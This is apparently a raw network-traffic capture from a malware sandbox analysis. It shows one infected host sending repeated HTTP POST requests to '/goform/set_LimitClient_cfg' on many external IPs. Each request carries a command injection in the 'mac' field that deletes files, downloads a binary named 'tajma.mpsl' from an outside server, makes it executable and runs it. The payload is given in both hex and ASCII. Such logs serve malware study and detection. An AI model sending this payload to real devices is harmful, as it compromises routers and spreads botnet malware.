                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1899192.168.2.2334278191.128.120.358080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.432591915 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1900192.168.2.2348888160.23.255.1728080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.432624102 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1901192.168.2.234130264.22.92.1488080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.432662010 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1902192.168.2.2333144100.205.178.2158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.432728052 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1903192.168.2.2336918185.181.165.1618080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.432756901 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1904192.168.2.2349022105.228.150.408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.432852030 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1905192.168.2.235684072.138.98.2258080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.432935953 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1906192.168.2.2359142157.203.235.1818080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.432957888 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1907192.168.2.2357140147.218.19.1638080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.432985067 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1908192.168.2.2352342122.71.4.1708080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433017015 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1909192.168.2.234778896.55.190.1288080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433044910 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1910192.168.2.2353186186.47.121.1508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433068991 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1911192.168.2.234810060.84.228.158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433104038 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1912192.168.2.2354074180.104.36.2238080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433123112 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1913192.168.2.235769046.200.150.808080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433197021 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1914192.168.2.2333468112.250.253.988080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433207989 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1915192.168.2.2357934168.227.121.1328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433224916 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1916192.168.2.2343910181.78.79.2388080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433259010 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1917192.168.2.2341904207.130.210.1218080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433296919 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1918192.168.2.2341144177.72.164.298080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433320045 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1919192.168.2.2358222183.113.202.1858080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433346033 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1920192.168.2.235806465.205.17.258080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433373928 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1921192.168.2.234067048.252.84.2558080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433412075 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
